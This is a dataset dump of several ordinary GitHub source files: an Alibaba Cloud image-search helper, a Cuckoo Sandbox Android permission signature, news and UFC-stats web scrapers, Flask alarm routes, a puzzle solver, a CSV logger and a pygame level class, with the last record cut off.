seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6877383992 | #from IPython.display
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from IPython.display import display
from IPython.core.display import HTML
import json
from pprint import pprint
import os
import time
#import md5
import hashlib
import os
from aliyunsdkcore.profile import region_provider
from aliyunsdkcore.client import AcsClient
import base64
import aliyunsdkimagesearch.request.v20190325.AddImageRequest as AddImageRequest
import aliyunsdkimagesearch.request.v20190325.DeleteImageRequest as DeleteImageRequest
import aliyunsdkimagesearch.request.v20190325.SearchImageRequest as SearchImageRequest
import os
import time
from pprint import pprint
def list_images(image_folder):
    """Map image file paths to their bare file names for one folder.

    Scans *image_folder* (non-recursively) for .jpg/.png files.

    Args:
        image_folder: Directory to scan.

    Returns:
        dict mapping joined path -> file name for every matching file.
    """
    images = {}
    for file_name in os.listdir(image_folder):
        # str.endswith accepts a tuple, so one call covers both extensions.
        if file_name.endswith((".jpg", ".png")):
            image_path = os.path.join(image_folder, file_name)
            images[image_path] = file_name
    return images
def get_Piccontent_from_file(image_path):
    """Read a file and return its content Base64-encoded.

    Args:
        image_path: Path of the file to read.

    Returns:
        Base64-encoded bytes of the file content.
    """
    # Binary mode is required on Python 3: base64.b64encode expects bytes,
    # and image data must not pass through text decoding. The original
    # opened in text mode (a Python 2 leftover) and leaked on exceptions
    # before reaching its try/finally; 'with' closes in all cases.
    with open(image_path, "rb") as file_object:
        return base64.b64encode(file_object.read())
def my_image_preview(image_path, box, cate, color="red"):
    """Open an image and draw the detected object box plus category label.

    Args:
        image_path: Path of the image to open.
        box: Region string "x0,x1,y0,y1" (comma separated), or None/'' to
            skip drawing the rectangle.
        cate: Category text drawn at the box's top-left corner; None/"" to
            skip the label.
        color: Outline and label color.

    Returns:
        The PIL Image with annotations drawn in place.
    """
    #img1 = Image(filename = image_path, width=100, height=100)
    img1 = Image.open(image_path)
    if box is not None and box != '':
        draw = ImageDraw.Draw(img1)
        # Region ordering is "x0,x1,y0,y1": indices 0/1 are the x pair,
        # indices 2/3 the y pair.
        bb = box.split(",")
        x0 = float(bb[0])
        y0 = float(bb[2])
        x1 = float(bb[1])
        x2 = float(bb[3])  # NOTE(review): named x2 but used as the second y coordinate
        draw.rectangle([(x0, y0), (x1, x2)], outline=color)
        if cate is not None and cate != "":
            draw.text((x0, y0), cate, fill=color)
    img = img1
    return img
###########################################################
###########################################################
def match_cate_desc(cate_id):
    """Translate a numeric category id into its description.

    Returns 'Other' when the id is not one of the known categories.
    """
    known_categories = {
        0: 'Tops', 1: 'Dress', 2: 'Bottoms', 3: 'Bag', 4: 'Shoes',
        5: 'Accessories', 6: 'Snack', 7: 'Makeup', 8: 'Bottle',
        9: 'Furniture', 20: 'Toy', 21: 'Underwear', 22: 'Digital device',
        88888888: 'Other',
    }
    return known_categories.get(cate_id, 'Other')
def my_image_upload_base(requestClient, endpoint, instanceName, ProductId, image_name, image_path, cate_id, cate_desc, obj_region):
    """Upload one image to an Alibaba Cloud Image Search instance.

    Args:
        requestClient: AcsClient used to issue the request.
        endpoint: Image Search service endpoint.
        instanceName: Target Image Search instance name.
        ProductId: Product id the picture is registered under.
        image_name: Picture name used as the PicName on the service.
        image_path: Local file path of the image to upload.
        cate_id: Category id to assign.
        cate_desc: Human-readable category description.
        obj_region: Object region string or None.

    Returns:
        Parsed JSON response of the AddImage call.
    """
    # load file
    request = AddImageRequest.AddImageRequest()
    request.set_endpoint(endpoint)
    request.set_InstanceName(instanceName)
    # Keep enough metadata in CustomContent to reconstruct previews later
    # without another lookup (path + category info).
    image_content = {'name': image_name, 'path': image_path, 'cate_id':cate_id, 'cate_desc':cate_desc, 'obj_region':obj_region}
    request.set_CustomContent(json.dumps(image_content))
    request.set_ProductId(ProductId)
    request.set_PicName(image_name)
    #if cate_id is not None:
    request.set_CategoryId(cate_id)
    print("=======", cate_id, image_name)
    # The service expects the picture content Base64-encoded.
    with open(image_path, 'rb') as imgfile:
        encoded_pic_content = base64.b64encode(imgfile.read())
        request.set_PicContent(encoded_pic_content)
    response = requestClient.do_action_with_exception(request)
    r = json.loads(response)
    # print(response)
    return r
#def my_image_upload_for_category():
def my_image_upload_for_similarity_search(requestClient, endpoint, instanceName, ProductId, image_name, image_path, cate_id, cate_desc, obj_region):
    """Upload an image and enrich the response with resolved category info.

    Adds flattened 'cate_desc', 'cate_id' and 'obj_region' keys (taken
    from the service's PicInfo) to the AddImage response.

    Returns:
        The AddImage response dict with the extra keys added.
    """
    r = my_image_upload_base(requestClient, endpoint, instanceName, ProductId, image_name, image_path, cate_id, cate_desc, obj_region)
    #print("== image upload return result ==")
    #pprint(r)
    # Trust the category the service detected, not the one passed in.
    cate_desc = match_cate_desc(r['PicInfo']['CategoryId'])
    r['cate_desc'] = cate_desc
    r['cate_id'] = r['PicInfo']['CategoryId']
    r['obj_region'] = r['PicInfo']['Region']
    #pprint(r)
    #display(my_image_preview(image_path, r['obj_region'], r['cate_desc']))
    #print(image_path, ' | found category_desc: ', r['cate_desc'], r['cate_id'], ' | found category_id: ', r['cate_id'], ' | found region: ', r['obj_region'])
    return r
###########################################################
###########################################################
def my_image_search_base(requestClient, instanceName, image_path):
    """Run a similarity search on the Image Search instance for one image.

    Args:
        requestClient: AcsClient used to issue the request.
        instanceName: Target Image Search instance name.
        image_path: Local file path of the query image.

    Returns:
        Parsed JSON response of the SearchImage call.
    """
    request = SearchImageRequest.SearchImageRequest()
    request.set_InstanceName(instanceName)
    # Query image content must be Base64-encoded, same as uploads.
    with open(image_path, 'rb') as imgfile:
        encoded_pic_content = base64.b64encode(imgfile.read())
        request.set_PicContent(encoded_pic_content)
    response = requestClient.do_action_with_exception(request)
    r = json.loads(response)
    #pprint(r)
    return r
def my_image_search_for_category_detection(requestClient, instanceName, image_path):
    """Search an image and resolve the detected category description.

    Augments the raw search response with flattened 'cate_desc',
    'cate_id' and 'obj_region' keys for convenient access.

    Returns:
        The search response dict with the extra keys added.
    """
    r = my_image_search_base(requestClient, instanceName, image_path)
    #r = json.loads(r)
    #pprint(r)
    category_desc = ''
    # Look up the detected CategoryId in the AllCategories table the
    # service returns alongside the result; '' if no entry matches.
    for c in r['PicInfo']['AllCategories']:
        if r['PicInfo']['CategoryId'] == c['Id']:
            category_desc = c['Name']
    r['cate_desc'] = category_desc
    r['cate_id'] = r['PicInfo']['CategoryId']
    r['obj_region'] = r['PicInfo']['Region']
    return r
def my_image_search_for_category_detection_display(requestClient, instanceName, image_path):
    """Category detection plus inline annotated preview (notebook use)."""
    r = my_image_search_for_category_detection(requestClient, instanceName, image_path)
    display(my_image_preview(image_path, r['obj_region'], r['cate_desc']))
    #print(image_path, ' | found category_desc: ', r['cate_desc'], r['cate_id'], ' | found category_id: ', r['cate_id'], ' | found region: ', r['obj_region'])
    return r
###########################################################
###########################################################
def my_image_search_for_similarity(requestClient, instanceName, image_path):
    """Find the most similar indexed image and render both side by side.

    Reads result index 1 of 'Auctions' (index 0 presumably being the
    query image itself — TODO confirm against the service response) and
    composes the query and best match onto one canvas for display.

    Returns:
        The raw search response dict.
    """
    r = my_image_search_base(requestClient, instanceName, image_path)
    #r = json.loads(r)
    #pprint(r)
    category_desc = ''
    for c in r['PicInfo']['AllCategories']:
        if r['PicInfo']['CategoryId'] == c['Id']:
            category_desc = c['Name']
    #pprint(r)
    #print(image_path, 'found category_desc: ', category_desc, r['PicInfo']['Category'], 'found category_id: ', r['PicInfo']['Category'], 'found region: ', r['PicInfo']['Region'])
    #image_similar_name = r['Auctions'][1]['PicName']
    #image_similar_path = r['Auctions'][1]['CustomContent']
    # CustomContent carries the metadata stored at upload time (see
    # my_image_upload_base), so the local path can be recovered.
    image_similar_name = json.loads(r['Auctions'][1]['CustomContent'])['name']
    image_similar_path = json.loads(r['Auctions'][1]['CustomContent'])['path']
    image_similar_score = r['Auctions'][1]['SortExprValues']
    category_desc = json.loads(r['Auctions'][1]['CustomContent'])['cate_desc']
    obj_region = json.loads(r['Auctions'][1]['CustomContent'])['obj_region']
    print(image_path)
    print("similar score: ", image_similar_score, "similar image: ", image_similar_path)
    #print(r['Auctions']['Auction'][1])
    img1 = my_image_preview(image_path, obj_region, category_desc)
    img2 = my_image_preview(image_similar_path, '0,0,0,0', 'most_similart_to', 'green')
    # Compose both previews onto one white canvas, 40px gutter between.
    img_height = img1.size[1]
    if img1.size[1] < img2.size[1]:
        img_height = img2.size[1]
    img = Image.new('RGB', (img1.size[0]+img2.size[0]+40, img_height), "white")
    img.paste(img1, (0, 0))
    img.paste(img2, (img1.size[0]+40, 0))
    #print(img)
    draw = ImageDraw.Draw(img)
    draw.text((img1.size[0]+20, img_height/2), '=>', fill="green")
    draw.text((img1.size[0]+20, img_height/2+10), 'most', fill="red")
    draw.text((img1.size[0]+20, img_height/2+20), 'similar', fill="red")
    draw.text((img1.size[0]+20, img_height/2+30), 'to', fill="red")
    draw.text((img1.size[0]+20, img_height/2+40), '=>', fill="green")
    sim_score = "{0:.0%}".format(float(image_similar_score.split(';')[0]))
    # NOTE(review): sim_score (the formatted percentage) is computed but
    # never drawn — the raw score string is rendered instead; looks like
    # sim_score was the intended text. Confirm before changing.
    draw.text((img1.size[0]+20, img_height/2+50), image_similar_score, fill="red")
    #display(img1)
    #display(img2)
    display(img)
    return r
| jhs2jhs/AlibabaCloud_ImageSearch_Demo_py2 | myutil.py | myutil.py | py | 8,204 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "base64.b64encode",
"line_num... |
6994057460 | from lib.cuckoo.common.abstracts import Signature
class AndroidGooglePlayDiff(Signature):
    """Flags APKs whose Google Play listing advertises permissions that
    the APK manifest does not declare (OSINT check)."""
    name = "android_google_play_diff"
    description = "Application Permissions On Google Play Differ (Osint)"
    severity = 3
    categories = ["android"]
    authors = ["Check Point Software Technologies LTD"]
    minimum = "2.0"

    def on_complete(self):
        # Permissions declared in the APK manifest.
        apk_permissions = [
            perm["name"]
            for perm in self.get_apkinfo("manifest", {}).get("permissions", [])
        ]
        # Permissions advertised on the Google Play store page.
        play_permissions = [perm for perm in self.get_googleplay("permissions", [])]
        # Anything listed on Google Play but absent from the manifest.
        missing = list(set(play_permissions) - set(apk_permissions))
        if missing:
            self.mark(permissions=missing)
            return True
| cuckoosandbox/community | modules/signatures/android/android_google_play_diff.py | android_google_play_diff.py | py | 867 | python | en | code | 312 | github-code | 36 | [
{
"api_name": "lib.cuckoo.common.abstracts.Signature",
"line_number": 3,
"usage_type": "name"
}
] |
41935148033 | import json
import re
from datetime import datetime
from newspaper import Article
i = 0  # running id assigned to each successfully parsed article
file_path = "./MK.json"
news_format_json = {}
news_format_json['MK'] = []
for y in range(2020, 2021):
    for m in range(1, 2):
        for n in range(0, 10001):
            # 'economy' in the path is irrelevant: the article shown is
            # determined solely by the numeric id 'n'.
            url = "https://www.mk.co.kr/news/economy/view/{}/{:02d}/{}/".format(y, m, n)
            art = Article(url, keep_article_html=True)
            try:
                art.download()
                art.parse()
                art2 = art.text.split()
            # Narrowed from a bare 'except:' so Ctrl-C / SystemExit still
            # interrupt the (potentially 10k-request) crawl.
            except Exception:
                print("***** error article *****")
                continue
            if not art2:
                print("***** blank article *****")
                continue
            print(i)
            # Publication date appears as YYYY.MM.DD somewhere in the HTML.
            match = re.search(r"\d{4}\.\d{2}\.\d{2}", art.html)
            if match is None:
                # Previously crashed with AttributeError on match.group();
                # skip articles without a recognizable date instead.
                print("***** no date found *****")
                continue
            dt = datetime.strptime(match.group(), "%Y.%m.%d")
            news_format_json['MK'].append({
                "id": i,
                "title": art.title,
                "text": art.text,
                "timestamp": [dt.year, dt.month, dt.day],
                "html": art.article_html
            })
            i += 1
with open(file_path, 'w', encoding='utf-8') as outfile:
    json.dump(news_format_json, outfile, indent=4, ensure_ascii=False)
print(news_format_json)
| hyeonoir/Stocksnet | MK.py | MK.py | py | 1,571 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "newspaper.Article",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "datetime.datet... |
43062682888 | import json
import scrapy
from scrapy.crawler import CrawlerProcess
def decodeEmail(e):
    """Decode a Cloudflare-style obfuscated email string.

    The first hex byte pair is an XOR key; each following hex byte pair
    is one character XOR-ed with that key.
    """
    key = int(e[:2], 16)
    # Walk the hex pairs after the key. Note: mirrors the original bound
    # of len(e) - 1, so a trailing odd character is ignored.
    return "".join(
        chr(int(e[pos:pos + 2], 16) ^ key)
        for pos in range(2, len(e) - 1, 2)
    )
# Static request headers mimicking a desktop Chrome browser so the site
# serves its normal HTML pages.
headers = {
    'Host': 'ufcstats.com',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Accept-Language': 'en-IN,en;q=0.9',
}
uniqe_clssses = []  # NOTE(review): never referenced in this module (name also misspelled)
class WEbCrawlerInS(scrapy.Spider):
    """Crawl ufcstats.com: events listing -> event pages -> fighter pages,
    yielding one stats record per fighter."""
    name = 'example'
    # Previously scraped fighters keyed by profile URL. Loaded at import
    # time: player_data.json must already exist or the import fails.
    player_map = {x["url"]: x for x in json.loads(open('player_data.json', 'r', encoding='utf-8-sig').read())}

    def start_requests(self):
        """Seed the crawl with the full completed-events listing."""
        yield scrapy.Request(
            url='http://ufcstats.com/statistics/events/completed?page=all',
            headers=headers, callback=self.parse,
        )

    def parse(self, response):
        """Follow every event link found in the events table."""
        for i in response.css('table.b-statistics__table-events tr.b-statistics__table-row'):
            try:
                event_url = i.css('td.b-statistics__table-col:nth-child(1) a::attr(href)').get(default="").strip()
                yield scrapy.Request(
                    url=event_url,
                    headers=headers, callback=self.parse_events
                )
            except:
                # NOTE(review): bare except silently drops rows without a
                # usable link (and would also swallow KeyboardInterrupt).
                pass

    def parse_events(self, response):
        """Follow each fighter link in an event's fight-details table."""
        for i in response.css('tbody.b-fight-details__table-body tr.b-fight-details__table-row'):
            for k in i.css('td:nth-child(2) > p > a::attr(href)').getall():
                yield scrapy.Request(
                    url=k,
                    headers=headers, callback=self.parse_fighter_data
                )

    def parse_fighter_data(self, response):
        """Extract name, W-L-D record and the stat list from a fighter page."""
        def getClaenList(lst):
            # Collapse the selector's text fragments into one string.
            return "".join([x.strip() for x in lst if x.strip() != ""])
        record = response.css('body > section > div > h2 > span.b-content__title-record::text').get(default="").replace(
            'Record:', '').strip()
        # Record has the form 'W-L-D'.
        wins,losses,draws = record.split('-')
        dataset = {'name': response.css('body > section > div > h2 > span.b-content__title-highlight::text').get(
            default="").strip(),
            'Record': record, "url": response.url,"wins":wins,"losses":losses,"draws":draws}
        # Each list item is a 'Label: value' pair; strip the label and the
        # colon to keep only the value.
        for i in response.css('ul li.b-list__box-list-item.b-list__box-list-item_type_block'):
            key = i.css('i::text').get(default="").replace(':', '').strip()
            val = getClaenList(i.css('::text').getall()).replace(key, '').replace(':', '').strip()
            dataset[key] = val
        yield dataset
if __name__ == "__main__":
    # Scrapy settings for this one-off crawl. The HTTP cache is enabled so
    # re-runs replay cached responses instead of re-hitting the site.
    settings = {
        # 'FEED_EXPORT_ENCODING': 'utf-8-sig',
        # 'FEED_EXPORT_BATCH_ITEM_COUNT': 100000,
        'FEED_FORMAT': 'json',  # csv, json, xml
        'FEED_URI': "player_data.json",  # also read back by WEbCrawlerInS.player_map
        'ROBOTSTXT_OBEY': False,
        # Configure maximum concurrent requests performed by Scrapy (default: 16)
        'CONCURRENT_REQUESTS': 5,
        'CONCURRENT_REQUESTS_PER_DOMAIN': 2500,
        'RETRY_ENABLED': False,
        'COOKIES_ENABLED': True,
        'LOG_LEVEL': 'INFO',
        'DOWNLOAD_TIMEOUT': 700,
        # 'DOWNLOAD_DELAY': 0.15,
        'RETRY_TIMES': 10,
        'HTTPCACHE_ENABLED': True,
        'HTTPCACHE_EXPIRATION_SECS': 0,  # 0 = cached responses never expire
        'HTTPCACHE_DIR': 'httpcache_new',
        # Do not cache error responses (4xx/5xx).
        'HTTPCACHE_IGNORE_HTTP_CODES': [int(x) for x in range(399, 600)],
        'HTTPCACHE_STORAGE': 'scrapy.extensions.httpcache.FilesystemCacheStorage'
    }
    c = CrawlerProcess(settings)
    c.crawl(WEbCrawlerInS)
    c.start()
{
"api_name": "scrapy.Spider",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "json.loads",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "scrapy.Request",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "scrapy.Request",
"li... |
9748891676 | from flask import request, Blueprint, abort
from models.alarm import Alarm
from models.response import ResponseJSON
alarm_routes = Blueprint("alarm", __name__, url_prefix="/server/alarm")
@alarm_routes.route("/", methods=["POST"])
def add_alarm():
    """Create an alarm from a JSON body {"name": ...}; 400 when missing."""
    if not request.json or 'name' not in request.json:
        abort(400)
    alarm = Alarm(request.json["name"]).save()
    return ResponseJSON(True, alarm.serialize(), None).serialize(), 201
@alarm_routes.route("/<int:aid_alarm>", methods=["DELETE"])
def delete_alarm(aid_alarm):
    """Delete the alarm with id *aid_alarm*; 404 when it does not exist."""
    alarm = Alarm.query.get(aid_alarm)
    if not alarm:
        return ResponseJSON(False, None, "Does not exist").serialize(), 404
    alarm.delete()
    return ResponseJSON(True, None, None).serialize(), 200
@alarm_routes.route("/<int:aid_alarm>", methods=["PUT"])
def update_alarm(aid_alarm):
    """Update an alarm's name or description.

    The query string selects the field ('?name=...' or '?desc=...') and
    the JSON body carries the new value ('name' or 'description').
    Returns 400 on a missing selector/body, 404 on an unknown alarm.
    """
    # NOTE(review): relies on 'and' binding tighter than 'or'; correct,
    # but parentheses would make the intent explicit.
    if len(request.args) == 0 or not request.args.get("name") and not request.args.get("desc"):
        abort(400)
    alarm = Alarm.query.get(aid_alarm)
    if not alarm:
        return ResponseJSON(False, None, "Does not exist").serialize(), 404
    if request.args.get("name"):
        if not request.json or "name" not in request.json:
            abort(400)
        alarm.name = request.json["name"]
    elif request.args.get("desc"):
        if not request.json or "description" not in request.json:
            abort(400)
        alarm.description = request.json["description"]
    alarm.update()
    return ResponseJSON(True, alarm.serialize(), None).serialize(), 200
@alarm_routes.route("/<int:aid_alarm>", methods=["GET"])
def get_alarm(aid_alarm):
    """Return the serialized alarm with id *aid_alarm*, or 404."""
    alarm = Alarm.query.get(aid_alarm)
    if not alarm:
        return ResponseJSON(False, None, "Does not exist").serialize(), 404
    return ResponseJSON(True, alarm.serialize(), None).serialize(), 200
| byUNiXx/kivy_flask_gps | server/src/routes/alarm.py | alarm.py | py | 1,817 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Blueprint",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask.request.json",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "flask.abort",
... |
71654885545 | import sys
import re
import ranges
def read_cleanup_file(filename, full_overlaps_only):
    """Count lines whose two section ranges overlap.

    Each input line has the form "a-b,c-d", describing two inclusive
    integer ranges. With *full_overlaps_only* True only pairs where one
    range fully contains the other are counted; otherwise any overlap
    counts.

    Args:
        filename: Path of the input file.
        full_overlaps_only: Restrict the count to full containment.

    Returns:
        Number of qualifying lines.

    Raises:
        Exception: If a line does not split into exactly four tokens.
    """
    count = 0  # renamed from 'sum', which shadowed the builtin
    with open(filename, 'r') as fp:
        for line in fp:
            toks = re.split(',|-', line.strip())
            if len(toks) != 4:
                raise Exception('wrong line format. tokens: %s' % toks)
            r1 = ranges.Range(int(toks[0]), int(toks[1]), include_end=True)
            r2 = ranges.Range(int(toks[2]), int(toks[3]), include_end=True)
            r12 = r1.union(r2)
            if full_overlaps_only:
                # Full containment: the union equals one of the inputs.
                if r12 == r1 or r12 == r2:
                    count += 1
            elif r12 is not None:
                # union() yields None for disjoint ranges, so any
                # non-None result means at least partial overlap.
                count += 1
    return count
if __name__ == '__main__':
    if len(sys.argv) != 2:
        # Previously only printed the usage and fell through, crashing
        # with IndexError on sys.argv[1]; exit explicitly instead.
        print('usage: python main.py INPUT')
        sys.exit(1)
    full_overlaps = read_cleanup_file(sys.argv[1], True)
    print('total full overlaps: %d' % full_overlaps)
    partial_overlaps = read_cleanup_file(sys.argv[1], False)
    print('total partial overlaps: %d' % partial_overlaps)
| dakopoulos/aoc22 | day4/main.py | main.py | py | 1,004 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.split",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "ranges.Range",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "ranges.Range",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 21,
... |
13491582898 | from datetime import datetime
import csv, os
class File:
    """Helper around a per-day CSV log file named './files/<name>_<date>.csv',
    with timestamped append helpers for sensor rows."""

    def __init__(self, name, date):
        # Handles are opened lazily by the write helpers below.
        self.fr = None
        self.fw = None
        self.fa = None
        self.filename = f"./files/{name}_{date}.csv"

    def filename_change(self, filename):
        """Point the helper at a different file path."""
        self.filename = filename

    def file_write(self, title, data):
        # NOTE(review): assumes self.fw is already an open handle; calling
        # this before any open raises AttributeError on None. Confirm the
        # intended call order.
        self.fw.write(f'[{title}] data = {data}')

    def file_write_time(self, title, address, data):
        """Append one '[title] address / data / datetime' line."""
        self.fw = open(self.filename, "a")
        self.fw.write(f'[{title}] address = {address} / data = {data} / datetime = {datetime.now()}\n')
        self.fw.close()

    def file_write_data(self, data):
        # NOTE(review): writes to the absolute path '/files/<...>.txt' and
        # appends '.txt' to a name that already ends in '.csv' — this looks
        # unintended compared to the other helpers; verify before relying on it.
        self.fw = open(f"/files/{self.filename}.txt", "a")
        self.fw.write(data)
        self.fw.close()

    def file_write_csv(self, data):
        """Append one sensor row (time-of-day added) to the CSV file.

        Writes the header row first when the file does not exist yet.
        """
        # str(datetime.now())[10:19] is the ' HH:MM:SS' slice of the ISO form.
        data.append(str(datetime.now())[10:19])
        if os.path.isfile(os.path.join(os.getcwd(),self.filename.replace("./","").replace("/","\\"))):
            # NOTE(review): backslash join is Windows-specific.
            f = open(self.filename, "a", newline='')
            wr = csv.writer(f)
            wr.writerow(data)
            f.close()
        else :
            f = open(self.filename, "w", newline='')
            wr = csv.writer(f)
            wr.writerow(["spo2", "spo2 confidence", "hr", "hr confidence", "walk", "run",
                         "motion flag", "activity", "battery", "scd", "acc x", "acc y", "acc z",
                         "gyro x", "gyro y", "gyro z", "fall detect", "temp", "pressure", "time"])
            wr.writerow(data)
            f.close()

    def file_write_close(self):
        """Close the current write handle."""
        self.fw.close()

    def return_today(self):
        """Return the current timestamp as 'YYYY-MM-DD HH-MM-SS'."""
        today = str(datetime.now())
        return f"{today[:10]} {today[11:13]}-{today[14:16]}-{today[17:19]}"
{
"api_name": "datetime.datetime.now",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.now",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "datetim... |
43552330299 | import pytest
from rest_framework import status
from tests.factories import JobFactory
@pytest.mark.django_db
def test_selection_create(client, user_access_token):
    """POST /selection/ creates a selection owned by the authenticated user.

    Fixtures: 'client' is the Django/DRF test client; 'user_access_token'
    yields a (user, JWT access token) pair.
    """
    user, access_token = user_access_token
    # Ten persisted jobs to reference from the new selection.
    job_list = JobFactory.create_batch(10)
    data = {
        "name": "Название подборки",
        "items": [job.pk for job in job_list]
    }
    # id == 1 assumes a fresh test database per test run.
    expected_data = {
        "id": 1,
        "owner": user.username,
        "name": "Название подборки",
        "items": [job.pk for job in job_list]
    }
    response = client.post("/selection/", data=data, HTTP_AUTHORIZATION=f"Bearer {access_token}")
    assert response.status_code == status.HTTP_201_CREATED
    assert response.data == expected_data
| VyacheslavTim/Lesson31 | tests/selection/selection_test.py | selection_test.py | py | 750 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tests.factories.JobFactory.create_batch",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "tests.factories.JobFactory",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "rest_framework.status.HTTP_201_CREATED",
"line_number": 26,
"usage_typ... |
36319285982 | from random import randint
from Savedata import Savedata
from entity.Entity import EntInt
from entity.Player import Player
from entity.Enemy.Boss import Boss
from entity.Enemy.Malicious import Malicious
from entity.Enemy.SimpleEnemy import SimpleEnemy
from entity.item.Shield import Shield
from entity.item.CadenceUp import CadUp
import pygame
class Level():
    """One playable level: loads its wave script, spawns enemy waves,
    runs a game-loop tick, and tracks win/advance/quit state."""
    # NOTE(review): class-level mutable attributes are shared by all Level
    # instances; 'enemy' is never used in this class.
    enemy=[]
    end=False

    def __init__(self,screen,screenw,screenh,savedata : Savedata, level_number) -> None:
        # NOTE(review): hard-coded Windows font paths break on other OSes.
        self.bigarial=pygame.font.Font('C:/Windows/Fonts/arial.ttf',100)
        self.arial=pygame.font.Font('C:/Windows/Fonts/arial.ttf',20)
        self.entint=EntInt()          # entity registry shared by all spawns
        self.screen=screen
        self.screenw=screenw
        self.screenh=screenh
        self.savedata=savedata
        self.entint.killcount=0
        self.nb_player=1              # set to 2 before start() for co-op
        self.number=level_number
        self.waves=self.get_waves()   # wave script parsed from Levels/<n>.txt
        self.current_wave=-1          # -1 so the first update spawns wave 0
        self.win=False
        self.pre_next=False           # True once the win cooldown started
        self.next=False               # True when the next level may load
        self.cooldown_until_next=1000 # ms to linger on the win screen
        self.start_cooldown=0

    def spawn_enemys_in_wave(self,wave : str):
        """Spawn enemies described by a wave string.

        The string is consumed in (count, type) character pairs, e.g.
        '3R1B' -> three 'R' enemies and one 'B'. Types: R=SimpleEnemy,
        M=Malicious, B=Boss; counts are single digits.
        """
        for i in range(len(wave)//2):
            nb=int(wave[2*i])
            type=wave[2*i+1]
            if(type=='R'):
                for j in range(nb):
                    SimpleEnemy(self.entint,self.screen,(randint(0,self.screenw-1),50))
            elif(type=='M'):
                for j in range(nb):
                    Malicious(self.entint,self.screen,(randint(0,self.screenw-1),50))
            elif(type=='B'):
                for j in range(nb):
                    Boss(self.entint,self.screen,(randint(0,self.screenw-1),50))

    def get_waves(self):
        """Read Levels/<number>.txt and split it into '/'-separated waves."""
        # NOTE(review): file handle is never closed.
        text=open("Levels/"+str(self.number)+".txt")
        content=text.read()
        return content.split('/')

    def start(self):
        """Create the player(s) if absent and start the frame clock."""
        if(self.entint.players.__len__()==0):
            Player(self.entint,scr=self.screen,pos=(self.screenw/2, self.screenh/2),key=(pygame.K_s,pygame.K_z,pygame.K_q,pygame.K_d,pygame.K_g))
            if(self.nb_player==2):
                Player(self.entint,scr=self.screen,pos=(self.screenw/2, self.screenh/2),key=(pygame.K_DOWN,pygame.K_UP,pygame.K_LEFT,pygame.K_RIGHT,pygame.K_KP2))
        self.clock=pygame.time.Clock()

    def update(self):
        """Run one game tick: events, entities, wave/win logic, HUD, quit."""
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                # NOTE(review): 'run' is a local that nothing reads — the
                # quit event has no effect here.
                run = False
        # Cap at 120 FPS; dt (ms) drives entity movement.
        dt = self.clock.tick(120)
        #pygame.draw.rect(self.screen, (135,206,235), pygame.Rect(0,0,self.screenw, self.screenh))
        self.entint.update(dt)
        if(len(self.entint.players)==0):
            #run=False
            game_over=self.bigarial.render("Game Over",False,(0,0,0))
            self.screen.blit(game_over,((self.screenw-game_over.get_width())/2,self.screenh/2))
        # All enemies dead: advance to the next wave, or flag the win.
        if((len(self.entint.enemys)==0)&(self.current_wave<len(self.waves))):
            self.current_wave+=1
            if(self.current_wave>=len(self.waves)):
                self.win=True
            else:
                self.spawn_enemys_in_wave(self.waves[self.current_wave])
        if(self.win):
            level_cleared=self.bigarial.render("Level Cleared",False,(0,0,0))
            self.screen.blit(level_cleared,((self.screenw-level_cleared.get_width())/2,self.screenh/2))
            # Linger on the win screen for cooldown_until_next ms before
            # allowing the next level to load.
            if(not self.pre_next):
                self.start_cooldown=pygame.time.get_ticks()
                self.pre_next=True
            else:
                if(pygame.time.get_ticks()-self.start_cooldown>self.cooldown_until_next):
                    self.next=True
        self.info_print()
        # Escape: persist the kill count and signal the caller to exit.
        if(pygame.key.get_pressed()[pygame.K_ESCAPE]):
            #print(self.entint.killcount)
            self.savedata.totalkillcount+=self.entint.killcount
            self.savedata.save()
            self.end=True
        #print(self.entint.players.sprites()[0].buffs,self.entint.players.sprites()[1].buffs)
        #print(len(self.entint.items))

    def info_print(self):
        """Draw the FPS and kill-count HUD in the screen corners."""
        fps=self.arial.render("fps :" + str(int(self.clock.get_fps())),False,(0,0,0),(255,255,255))
        self.screen.blit(fps,(self.screenw-70,self.screenh-30))
        kc=self.arial.render("killcount :" + str(self.entint.killcount),False,(0,0,0),(255,255,255))
        self.screen.blit(kc,(0,self.screenh-30))
| 2doupo/Shooter | Levels/Level.py | Level.py | py | 5,657 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Savedata.Savedata",
"line_number": 15,
"usage_type": "name"
},
{
